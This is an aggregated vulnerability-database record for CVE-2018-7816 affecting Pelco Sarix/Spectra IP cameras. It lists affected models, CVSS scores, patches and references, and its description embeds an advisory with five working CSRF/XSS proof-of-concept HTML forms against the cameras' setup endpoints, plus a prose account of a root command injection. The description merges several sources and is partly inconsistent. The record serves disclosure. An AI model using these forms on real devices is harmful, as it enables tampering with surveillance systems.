Details of VAR-201905-1022

ID

VAR-201905-1022

CVE

CVE-2018-7816

TITLE

Pelco Sarix Enhanced Camera Vulnerabilities related to authorization, permissions, and access control

Trust: 0.8

sources: JVNDB: JVNDB-2018-015516

DESCRIPTION

A Permissions, Privileges, and Access Control vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to delete an arbitrary file. Pelco Sarix Enhanced Camera Contains vulnerabilities related to authorization, permissions, and access control.Information may be tampered with. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectricPelcoSarix/SpectraCameras has multiple cross-site scripting vulnerabilities that an attacker can exploit to execute arbitrary HTML and script code. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras from Schneider Electric, France. The vulnerability stems from the lack of effective permissions and access control measures for network systems or products. An attacker could exploit the vulnerability to cause a system denial of service. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0) Summary: Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. From our industry-leading fixed and high-speed IP cameras to panoramic, thermal imaging, explosionproof and more, we offer a camera for any environment, any lighting condition and any application. When nothing but the best will do. SarixaC/ Enhanced Range cameras provide the most robust feature-set for your mission-critical applications. With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image in difficult lighting conditions such as a combination of bright areas, shaded areas, and intense light. Designed with superior reliability, fault tolerance, and processing speed, these rugged fixed IP cameras ensure you always get the video that you need. Desc: Pelco cameras suffer from multiple dom-based, stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) Lighttpd/1.4.28 PHP/5.3.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2017-5415 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php 07.04.2017 -- CSRF/XSS on username parameter: ------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/setup/network/dot1x/update" method="POST"> <input type="hidden" name="dot1x" value="on" /> <input type="hidden" name="protocol" value="EAP-TLS" /> <input type="hidden" name="inner_auth" value="CHAP" /> <input type="hidden" name="username" value='"><script>alert(1)</script>' /> <input type="hidden" name="password" value="blah" /> <input type="hidden" name="anonymous_id" value="" /> <input type="hidden" name="ca_certificate" value="test" /> <input type="hidden" name="client_certificate" value="test" /> <input type="hidden" name="private_key" value="test" /> <input type="hidden" name="private_key_password" value="test" /> <input type="submit" value="Submit request" /> </form> </body> </html> CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter: ------------------------------------------------------------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/setup/network/general/update" method="POST"> <input type="hidden" name="hostname" value='"><script>alert(2)</script>' /> <input type="hidden" name="http_port" value='"><script>alert(3)</script>' /> <input type="hidden" name="rtsp_port" value='"><script>alert(4)</script>' /> <input type="hidden" name="dhcp" value="off" /> <input type="hidden" name="ip_address" value='"><script>alert(5)</script>' /> <input type="hidden" name="subnet_mask" value='"><script>alert(6)</script>' /> <input type="hidden" name="gateway" value='"><script>alert(7)</script>' /> <input type="hidden" name="nameservers" value='"><script>alert(8)</script>' /> <input type="submit" value="Submit request" /> </form> </body> </html> CSRF/XSS on version parameter: ------------------------------ <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/setup/network/snmp/update" method="POST"> <input type="hidden" name="version" value='";alert(9)//' /> <input type="hidden" name="v2_community_string" value="public" /> <input type="hidden" name="v2_receiver_address" value="" /> <input type="hidden" name="v2_trap_community_string" value="trapbratce" /> <input type="submit" value="Submit request" /> </form> </body> </html> CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter: ---------------------------------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/setup/system/general/update" method="POST"> <input type="hidden" name="device_name" value='ZSL"><script>alert(10)</script>' /> <input type="hidden" name="enable_leds" value="on" /> <input type="hidden" name="smtp_server" value='"><script>alert(11)</script>' /> <input type="hidden" name="ntp_server_from_dhcp" value="false" /> <input type="hidden" name="ntp_server" value="';alert(12)//'" /> <input type="hidden" name="region" value="Macedonia';alert(13)//" /> <input type="hidden" name="zone" value="Kumanovo';alert(14)//" /> <input type="hidden" name="enable_time_overlay" value="on" /> <input type="hidden" name="enable_name_overlay" value="off" /> <input type="hidden" name="position" value="topright" /> <input type="hidden" name="date_format" value="0" /> <input type="submit" value="Submit request" /> </form> </body> </html> XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter: -------------------------------------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/setup/events/handlers/update" method="POST"> <input type="hidden" name="id" value="" /> <input type="hidden" name="relay_sentinel" value="relay_sentinel" /> <input type="hidden" name="name" value='"><script>alert(15)</script>' /> <input type="hidden" name="type" value="Ftp" /> <input type="hidden" name="email_to" value="" /> <input type="hidden" name="email_from" value="" /> <input type="hidden" name="email_subject" value="" /> <input type="hidden" name="email_message" value="" /> <input type="hidden" name="dest_name" value="IMG%m%d%Y%H%M%S.jpg" /> <input type="hidden" name="limit_size" value="" /> <input type="hidden" name="limit_size_scale" value="K" /> <input type="hidden" name="ftp_server" value='"><script>alert(16)</script>' /> <input type="hidden" name="ftp_username" value='"><script>alert(17)</script>' /> <input type="hidden" name="ftp_password" value='"><script>alert(18)</script>' /> <input type="hidden" name="ftp_base_path" value='"><script>alert(19)</script>' /> <input type="hidden" name="ftp_dest_name" value="IMG%m%d%Y%H%M%S.jpg" /> <input type="hidden" name="relay_bankName" value="GPIO" /> <input type="hidden" name="relay_index" value="0" /> <input type="hidden" name="relay_on_time" value="0.1" /> <input type="hidden" name="relay_off_time" value="0.1" /> <input type="hidden" name="relay_pulse_count" value="" /> <input type="hidden" name="filter_start0" value="" /> <input type="hidden" name="filter_stop0" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>

Trust: 2.97

sources: NVD: CVE-2018-7816 // JVNDB: JVNDB-2018-015516 // CNVD: CNVD-2017-23302 // CNVD: CNVD-2019-15702 // ZSL: ZSL-2017-5417 // ZSL: ZSL-2017-5415 // PACKETSTORM: 143313

IOT TAXONOMY

category:	['ICS', 'Network device']	sub_category:	-	Trust: 0.6
category:	['IoT']	sub_category:	-	Trust: 0.6

sources: CNVD: CNVD-2017-23302 // CNVD: CNVD-2019-15702

AFFECTED PRODUCTS

vendor:	schneider electric	model:	imes19-1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ixe11	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	d6220l	scope:	gte	version:	2.11	Trust: 1.0
vendor:	schneider electric	model:	ime3122-b1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1ep	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1vp	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ixes1	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1vi	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1es	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ixe21	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1ei	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1es	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1ep	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1vi	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1es	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1vs	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-b1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1ei	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1vi	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-b1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1vs	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1ep	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1ep	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-b1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1vs	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1vp	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1vi	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1vp	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	d6220	scope:	gte	version:	2.11	Trust: 1.0
vendor:	schneider electric	model:	ime3122-b1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	d6230	scope:	gte	version:	2.11	Trust: 1.0
vendor:	schneider electric	model:	ime119-1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1ep	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	d6230l	scope:	gte	version:	2.11	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1ei	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1vp	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1ei	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1es	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1es	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1vs	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1vs	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1vi	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ixe31	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1vp	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1ei	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-b1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	d6220	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	d6220l	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	d6230	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	d6230l	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	ime119-1i	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	ime119-1p	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	ime119-1s	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	imes19-1i	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	imes19-1p	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	imes19-1s	scope:	-	version:	-	Trust: 0.8
vendor:	pelco	model:	sarix/spectra cameras	scope:	-	version:	-	Trust: 0.6
vendor:	schneider	model:	electric spectra enhanced model: d6230 2.2.0.5.9340-a0.0	scope:	eq	version:	-	Trust: 0.6
vendor:	schneider	model:	electric sarix model: id10dn 1.8.2.18-20121109-1.9110-o3.8503	scope:	eq	version:	-	Trust: 0.6
vendor:	schneider	model:	electric sarix model: d5230 1.9.2.23-20141118-1.9330-a1.10722	scope:	eq	version:	-	Trust: 0.6
vendor:	schneider	model:	electric sarix enhanced model: ime119 2.1.2.0.8280-a0.0	scope:	eq	version:	-	Trust: 0.6
vendor:	schneider	model:	electric sarix enhanced model: ime219 2.1.2.0.8280-a0.0	scope:	eq	version:	-	Trust: 0.6
vendor:	schneider	model:	electric 1st gen pelco sarix enhanced camera	scope:	-	version:	-	Trust: 0.6
vendor:	schneider electric se	model:	pelco sarix/spectra cameras root remote code execution	scope:	eq	version:	sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras root remote code execution	scope:	eq	version:	sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras root remote code execution	scope:	eq	version:	sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras root remote code execution	scope:	eq	version:	sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras root remote code execution	scope:	eq	version:	spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras multiple xss vulnerabilities	scope:	eq	version:	sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras multiple xss vulnerabilities	scope:	eq	version:	sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras multiple xss vulnerabilities	scope:	eq	version:	sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras multiple xss vulnerabilities	scope:	eq	version:	sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras multiple xss vulnerabilities	scope:	eq	version:	spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)	Trust: 0.1

sources: ZSL: ZSL-2017-5417 // ZSL: ZSL-2017-5415 // CNVD: CNVD-2017-23302 // CNVD: CNVD-2019-15702 // JVNDB: JVNDB-2018-015516 // NVD: CVE-2018-7816

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2018-7816
value:	MEDIUM
Trust: 1.0
NVD:	CVE-2018-7816
value:	MEDIUM
Trust: 0.8
CNVD:	CNVD-2017-23302
value:	MEDIUM
Trust: 0.6
CNVD:	CNVD-2019-15702
value:	MEDIUM
Trust: 0.6
CNNVD:	CNNVD-201905-904
value:	MEDIUM
Trust: 0.6
ZSL:	ZSL-2017-5417
value:	(4/5)
Trust: 0.1
ZSL:	ZSL-2017-5415
value:	(3/5)
Trust: 0.1

nvd@nist.gov:	CVE-2018-7816
severity:	MEDIUM
baseScore:	5.5
vectorString:	AV:N/AC:L/AU:S/C:N/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	SINGLE
confidentialityImpact:	NONE
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	8.0
impactScore:	4.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.8
CNVD:	CNVD-2017-23302
severity:	MEDIUM
baseScore:	4.3
vectorString:	AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	PARTIAL
availabilityImpact:	NONE
exploitabilityScore:	8.6
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
CNVD:	CNVD-2019-15702
severity:	MEDIUM
baseScore:	5.5
vectorString:	AV:N/AC:L/AU:S/C:N/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	SINGLE
confidentialityImpact:	NONE
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	8.0
impactScore:	4.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6

nvd@nist.gov:	CVE-2018-7816
baseSeverity:	MEDIUM
baseScore:	6.5
vectorString:	CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	LOW
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	NONE
integrityImpact:	HIGH
availabilityImpact:	NONE
exploitabilityScore:	2.8
impactScore:	3.6
version:	3.0
Trust: 1.8

sources: ZSL: ZSL-2017-5417 // ZSL: ZSL-2017-5415 // CNVD: CNVD-2017-23302 // CNVD: CNVD-2019-15702 // JVNDB: JVNDB-2018-015516 // CNNVD: CNNVD-201905-904 // NVD: CVE-2018-7816

PROBLEMTYPE DATA

problemtype:	NVD-CWE-noinfo	Trust: 1.0
problemtype:	CWE-264	Trust: 0.8

sources: JVNDB: JVNDB-2018-015516 // NVD: CVE-2018-7816

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201905-904

TYPE

permissions and access control issues

Trust: 0.6

sources: CNNVD: CNNVD-201905-904

CONFIGURATIONS

sources: JVNDB: JVNDB-2018-015516

EXPLOIT AVAILABILITY

sources: ZSL: ZSL-2017-5417 // ZSL: ZSL-2017-5415

PATCH

title:	SEVD-2019-045-03	url:	https://www.schneider-electric.com/en/download/document/SEVD-2019-045-03/	Trust: 0.8
title:	Patch for SchneiderElectric1stGenPelcoSarixEnhancedCamera Permissions and Access Control Issue Vulnerabilities	url:	https://www.cnvd.org.cn/patchInfo/show/162301	Trust: 0.6
title:	Schneider Electric 1st Gen Pelco Sarix Enhanced Camera Fixes for permissions and access control issues vulnerabilities	url:	http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=92882	Trust: 0.6

sources: CNVD: CNVD-2019-15702 // JVNDB: JVNDB-2018-015516 // CNNVD: CNNVD-201905-904

EXTERNAL IDS

db:	NVD	id:	CVE-2018-7816	Trust: 3.0
db:	SCHNEIDER	id:	SEVD-2019-045-03	Trust: 1.8
db:	JVNDB	id:	JVNDB-2018-015516	Trust: 0.8
db:	EXPLOIT-DB	id:	42307	Trust: 0.7
db:	EXPLOITDB	id:	42307	Trust: 0.6
db:	CNVD	id:	CNVD-2017-23302	Trust: 0.6
db:	CNVD	id:	CNVD-2019-15702	Trust: 0.6
db:	CNNVD	id:	CNNVD-201905-904	Trust: 0.6
db:	PACKETSTORM	id:	143313	Trust: 0.2
db:	ZSL	id:	ZSL-2017-5415	Trust: 0.2
db:	PACKETSTORM	id:	143315	Trust: 0.1
db:	NVD	id:	CVE-2018-7829	Trust: 0.1
db:	CXSECURITY	id:	WLB-2017070080	Trust: 0.1
db:	EXPLOIT-DB	id:	42309	Trust: 0.1
db:	ZSL	id:	ZSL-2017-5417	Trust: 0.1
db:	NVD	id:	CVE-2018-7827	Trust: 0.1
db:	CXSECURITY	id:	WLB-2017070075	Trust: 0.1

sources: ZSL: ZSL-2017-5417 // ZSL: ZSL-2017-5415 // CNVD: CNVD-2017-23302 // CNVD: CNVD-2019-15702 // JVNDB: JVNDB-2018-015516 // PACKETSTORM: 143313 // CNNVD: CNNVD-201905-904 // NVD: CVE-2018-7816

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2018-7816	Trust: 2.0
url:	https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/	Trust: 1.8
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7816	Trust: 0.8
url:	https://www.exploit-db.com/exploits/42307/	Trust: 0.7
url:	https://www.exploit-db.com/exploits/42309/	Trust: 0.1
url:	https://cxsecurity.com/issue/wlb-2017070080	Trust: 0.1
url:	https://packetstormsecurity.com/files/143315	Trust: 0.1
url:	https://exchange.xforce.ibmcloud.com/vulnerabilities/129667	Trust: 0.1
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7829	Trust: 0.1
url:	https://cxsecurity.com/issue/wlb-2017070075	Trust: 0.1
url:	https://packetstormsecurity.com/files/143313	Trust: 0.1
url:	https://exchange.xforce.ibmcloud.com/vulnerabilities/129665	Trust: 0.1
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7827	Trust: 0.1
url:	http://192.168.1.1/setup/network/dot1x/update"	Trust: 0.1
url:	http://192.168.1.1/setup/system/general/update"	Trust: 0.1
url:	http://192.168.1.1/setup/events/handlers/update"	Trust: 0.1
url:	http://192.168.1.1/setup/network/general/update"	Trust: 0.1
url:	http://192.168.1.1/setup/network/snmp/update"	Trust: 0.1
url:	https://www.pelco.com	Trust: 0.1
url:	http://www.zeroscience.mk/en/vulnerabilities/zsl-2017-5415.php	Trust: 0.1

CREDITS

Vulnerability discovered by Gjoko Krstic

Trust: 0.2

sources: ZSL: ZSL-2017-5417 // ZSL: ZSL-2017-5415

SOURCES

db:	ZSL	id:	ZSL-2017-5417
db:	ZSL	id:	ZSL-2017-5415
db:	CNVD	id:	CNVD-2017-23302
db:	CNVD	id:	CNVD-2019-15702
db:	JVNDB	id:	JVNDB-2018-015516
db:	PACKETSTORM	id:	143313
db:	CNNVD	id:	CNNVD-201905-904
db:	NVD	id:	CVE-2018-7816

LAST UPDATE DATE

2024-11-23T21:39:29.699000+00:00

SOURCES UPDATE DATE

db:	ZSL	id:	ZSL-2017-5417	date:	2019-02-23T00:00:00
db:	ZSL	id:	ZSL-2017-5415	date:	2019-02-23T00:00:00
db:	CNVD	id:	CNVD-2017-23302	date:	2017-08-28T00:00:00
db:	CNVD	id:	CNVD-2019-15702	date:	2019-05-29T00:00:00
db:	JVNDB	id:	JVNDB-2018-015516	date:	2019-06-11T00:00:00
db:	CNNVD	id:	CNNVD-201905-904	date:	2020-08-25T00:00:00
db:	NVD	id:	CVE-2018-7816	date:	2024-11-21T04:12:47.140

SOURCES RELEASE DATE

db:	ZSL	id:	ZSL-2017-5417	date:	2017-07-10T00:00:00
db:	ZSL	id:	ZSL-2017-5415	date:	2017-07-10T00:00:00
db:	CNVD	id:	CNVD-2017-23302	date:	2017-08-28T00:00:00
db:	CNVD	id:	CNVD-2019-15702	date:	2019-05-29T00:00:00
db:	JVNDB	id:	JVNDB-2018-015516	date:	2019-06-11T00:00:00
db:	PACKETSTORM	id:	143313	date:	2017-07-11T04:32:15
db:	CNNVD	id:	CNNVD-201905-904	date:	2019-05-22T00:00:00
db:	NVD	id:	CVE-2018-7816	date:	2019-05-22T20:29:00.980